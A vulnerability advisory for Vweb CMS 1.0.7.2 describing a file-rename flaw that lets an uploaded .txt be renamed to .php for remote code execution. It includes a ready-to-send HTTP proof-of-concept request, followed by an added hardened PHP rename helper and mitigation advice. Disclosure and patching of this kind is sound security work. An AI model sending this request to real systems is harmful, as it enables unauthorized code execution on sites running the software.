## Critical Vulnerability Information

### Vulnerability Overview

- **Vendor**: Vweb
- **Product**: Vweb CMS
- **Version**: 1.0.7.2
- **Download Link**: https://github.com/givons/Vweb

### Vulnerability Description

Vweb CMS version 1.0.7.2 contains an arbitrary file upload vulnerability. Users can directly rename files, and there are no restrictions on file extensions. By uploading a file with a common extension (e.g., .txt) and then renaming it to .php, attackers can achieve Remote Code Execution (RCE).

### Analysis

- **Problem Code**: `Vweb1.0.7.2/system/traits/media.php`
- **Root Cause**:
  - The function directly calls PHP's `rename` function without validating the file extension.
  - No blacklist mechanism is in place, allowing arbitrary file renaming.

### Exploitation Steps

1. **Upload File**: Upload a .txt file containing a malicious script.
2. **Rename File**: Rename the .txt file to .php.
3. **Execute Command**: Access the uploaded .php file to trigger RCE.

### POC (Proof of Concept)

```http
POST /admin/index.php?r=admin%2Fmedia%2FmediaAction&rename HTTP/1.1
Host: 192.168.1.1:8083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 52
Origin: http://192.168.1.1:8083
Connection: close

file=shell.txt&newNameFile=shell.php
```

Accessing the uploaded `shell.php` file triggers RCE.
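
The root cause above is a `rename` call with no extension validation. The following is an added example of a hardened rename helper, not code from Vweb or its author; the function name `safe_media_rename`, the `ALLOWED_EXT` list and the media directory layout are assumptions for illustration.

```php
<?php
// Added example: hypothetical hardened rename helper, not Vweb's own code.
// ALLOWED_EXT and the media directory layout are assumptions for illustration.
const ALLOWED_EXT = ['jpg', 'jpeg', 'png', 'gif', 'webp', 'pdf', 'txt'];

function safe_media_rename(string $mediaDir, string $file, string $newName): bool
{
    // Reject names carrying a directory component instead of silently stripping it.
    if ($file !== basename($file) || $newName !== basename($newName)) {
        return false;
    }
    // Exactly one extension, conservative characters, no leading dot:
    // refuses "note.php.jpg", ".htaccess", NUL bytes and whitespace.
    if (!preg_match('/\A[A-Za-z0-9][A-Za-z0-9_-]*\.([A-Za-z0-9]+)\z/', $newName, $m)) {
        return false;
    }
    // Allow-list rather than blacklist: ".php" and any unknown extension are refused.
    if (!in_array(strtolower($m[1]), ALLOWED_EXT, true)) {
        return false;
    }
    // Resolve symlinks and confirm the source sits directly in the media directory.
    $base = realpath($mediaDir);
    $src  = $base === false ? false : realpath($base . DIRECTORY_SEPARATOR . $file);
    if ($src === false || dirname($src) !== $base || !is_file($src)) {
        return false;
    }
    // Never overwrite an existing file through a rename.
    $dst = $base . DIRECTORY_SEPARATOR . $newName;
    if (file_exists($dst)) {
        return false;
    }
    return rename($src, $dst);
}

// Constructed demo in a throwaway directory.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'media_' . bin2hex(random_bytes(4));
mkdir($dir, 0700);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'note.txt', "constructed sample\n");

foreach (['note.php', 'note.php.jpg', '.htaccess', '../note.txt', 'renamed.txt'] as $target) {
    $ok = safe_media_rename($dir, 'note.txt', $target);
    printf("%-14s %s\n", $target, $ok ? 'renamed' : 'rejected');
}
```

Extension checks are one layer; serving the media directory with script execution disabled limits the impact if a check is bypassed.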